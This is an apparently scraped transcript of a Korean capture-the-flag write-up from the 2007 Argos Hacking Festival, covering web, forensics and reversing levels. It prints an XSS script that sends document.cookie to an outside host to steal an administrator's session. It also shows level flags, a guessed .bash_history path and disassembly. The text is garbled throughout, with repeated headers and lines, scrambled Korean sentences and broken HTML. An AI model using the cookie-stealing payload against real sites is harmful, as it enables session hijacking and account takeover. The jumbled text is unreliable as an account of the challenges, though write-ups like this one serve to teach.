argos hacking festival 2007
Post on 02-Feb-2022
2 Views
Preview:
TRANSCRIPT
- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -- Argos Hacking Festival 2007 -
2007. 1. 15~16
윤석언(slaxcore@gmail.com)
http://168.188.130.242/ahf2006/ (jhysu)
=================================== Level1=================================== Level1=================================== Level1=================================== Level1
<center>
<a href=http://www.spidynamics.com/assets/documents/HackingFeeds.pdf><img
src=../img/rss.jpg border=0></a><br>
위 그림을 클릭하시면 위 문서 를 다운받으실 수 있습니<font color=#AAAAAA> (PDF)
다.</font><br><br><script>alert('AHF2006 uses a rss feed, just for fun
은 데프콘 에서 발표된 취약점입니:D');</script>RSS/ATOM Feed Injection 2006
다 취약점이 아직 대부분의 프로그램에서 존재합니다 앞으로.<br>XSS RSS Reader .<br>
이에 대한 주의가 필요하지 않을까싶네요^^<br><iframe src=./rss_password width=0<iframe src=./rss_password width=0<iframe src=./rss_password width=0<iframe src=./rss_password width=0
height=0>height=0>height=0>height=0>
=================================== Level 3=================================== Level 3=================================== Level 3=================================== Level 3
소스보기
파일 다운로드 됨default.css .
========================================== Level8========================================== Level8========================================== Level8========================================== Level8
manlikessexygirl
========================================== Level7========================================== Level7========================================== Level7========================================== Level7
========================================== Level5========================================== Level5========================================== Level5========================================== Level5
의 을 구글링 한다badboys URL .
========================================== Level6========================================== Level6========================================== Level6========================================== Level6
아무데서나 소스보기 가 있는데 그 파일을 아래와 같이 포트로 요청을-> /css/embed.js , ~~.css 80
한다 이렇게 임포트 되어 있다. import(ahf~~~) .
========================================== Level2========================================== Level2========================================== Level2========================================== Level2
게시판에 공격을 하면 됨to.ahf2006 XSS .
이런식으로....
그러면 관리자가 읽으면 쿠키가 위 경로로 저장이 된다.
Social_is_best_hacking
# telnet 168.188.130.242 80
Trying 168.188.130.242...
Connected to 168.188.130.242.
Escape character is '^]'.
http://168.188.130.242/ahf2006/css/embed.js
축하합니다 정답입니다<font color=#ffffff><small> ! level6 !</small></font><br><font
패스워드는 입니다color=#ffffff><small> HackTheFlashActionScript .</small></font>
<script>self.location='http://168.188.130.242/ahf2006/';</script>Connection
closed by foreign host.
<script language=javascript>
window.open("http://xxx.xxx.xxx.xxx/~slaxcore/aa.php?cook="+document.cooki
e);</script>
========================================== Level4========================================== Level4========================================== Level4========================================== Level4
소스보기 하면 아래의 경로 의심..(~admin) ...
http://168.188.130.242/~admin/.bash_history 파일 경로 및 파일명 유추
ll
echo "binish is handsome! :p"
vi css/default.css
cd main/
ll
vi head.php
cd ../img
ll
cd ../main/
ll
vi head.php
cd ..
ll
cd ..
ll
cd /usr/local/apache/htdocs/
ll
ll
cd css/
cd ..
ll
cd
ll
cd ahf2006/
ll
d main/
ll
cd main/
vi head.php
ll
mv udcsc.php contact.php
vi hoe
ll
echo "x15kangx is the new face of argos!"
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi home.php
vi head.php
vi tail.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
vi home.php
vi head.php
wget "http://sexy_site/ya_han_movie.avi"
vi home.php
ll
vi intro.php
vi ../join/join
vi ../join/join.php
vi level.php
vi ../board/board_list.php
vi head.php
vi contact.php
i home.php
vi home.php
vi head.php
ll
vi home.php
vi head.php
ll
vi ../board/board_list.php
vi contact.php
vi ../board/board_list.php
vi head.php
vi level.php
vi re
vi ../join/join.php
exit
x
cd ahf2006/
ll
cd main
ll
vi head.php
ll
vi default.css default.css
vi default.css
vi default.css
ll
cd ..
cd /home/admin/public_html/admin/
vi index.php
vi /usr/local/apache/conf/httpd.conf
/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin/usr/local/apache/bin/htpasswd -c /home/admin/public_html/auth admin
/usr/local/apache/bin/apachectl restart
ll
cd main
ll
vi intro.php
vi intro.php
ll
vi member.php
ll
cd ..
위 빨간 글씨부분이 눈여겨 보아야 할 부분임....
ll
vi member.
vi member.php
ll
cd join
ll
cd ..
ll
cd css
vi default.css
ll
cd ..
ll
vi main/home.php
cd css/
ll
vi default.css
ll
cd ..
cd ..
ll
ll
cd ../dhf2006/
ll
vi main/home.php
vi main/head.php
cd
cd ahf2006/
ll
vi css/default.css
ll
pwd
cd ..
=================================================Level9=================================================Level9=================================================Level9=================================================Level9
리버싱을 통한 개의 숫자 합을 구하는 문제2006
004066F6 . 8D7424 20 LEA ESI,DWORD PTR SS:[ESP+20]
004066FA > 8B2E MOV EBP,DWORD PTR DS:[ESI]
합을 에 저장004066FC . 03FD ADD EDI,EBP ; edi
004066FE . 40 INC EAX
004066FF . 894424 1C MOV DWORD PTR SS:[ESP+1C],EAX
00406703 . 50 PUSH EAX
00406704 . 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00406708 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040670D . 50 PUSH EAX
0040670E . E8 87430100 CALL AHF2006.0041AA9A
00406713 . 83C4 0C ADD ESP,0C
00406716 . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
번째 값0040671A . 68 70014300 PUSH AHF2006.00430170 ; :
0040671F . E8 14930100 CALL AHF2006.0041FA38
00406724 55 PUSH EBP00406724 55 PUSH EBP00406724 55 PUSH EBP00406724 55 PUSH EBP 합을 출력; push edi ( )
00406725 . 8D4C24 18 LEA ECX,DWORD PTR SS:[ESP+18]
00406729 . 68 7C014300 PUSH AHF2006.0043017C ; ASCII "%d"
0040672E . 51 PUSH ECX
0040672F . E8 66430100 CALL AHF2006.0041AA9A
00406734 . 83C4 0C ADD ESP,0C
00406737 . 8D5424 14 LEA EDX,DWORD PTR SS:[ESP+14]
0040673B . 8D4C24 10 LEA ECX,DWORD PTR SS:[ESP+10]
0040673F . 52 PUSH EDX
00406740 . E8 1A930100 CALL AHF2006.0041FA5F
00406745 . 8B4424 10 MOV EAX,DWORD PTR SS:[ESP+10]
00406749 . 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
0040674D . 53 PUSH EBX
0040674E . 53 PUSH EBX
0040674F . 50 PUSH EAX
00406750 E8 B67A0100 CALL AHF2006.0041E20B
00406755 8B4424 1C MOV EAX,DWORD PTR SS:[ESP+1C]
00406759 83C6 04 ADD ESI,4
0040675C 3D D6070000 CMP EAX,7D6
00406761 ^ 7C 97 JL SHORT AHF2006.004066FA
00406763 . 8D4C24 14 LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]LEA ECX,DWORD PTR SS:[ESP+14]
00406767 . 889C24 801F00>MOV BYTE PTR SS:[ESP+1F80],BL
top related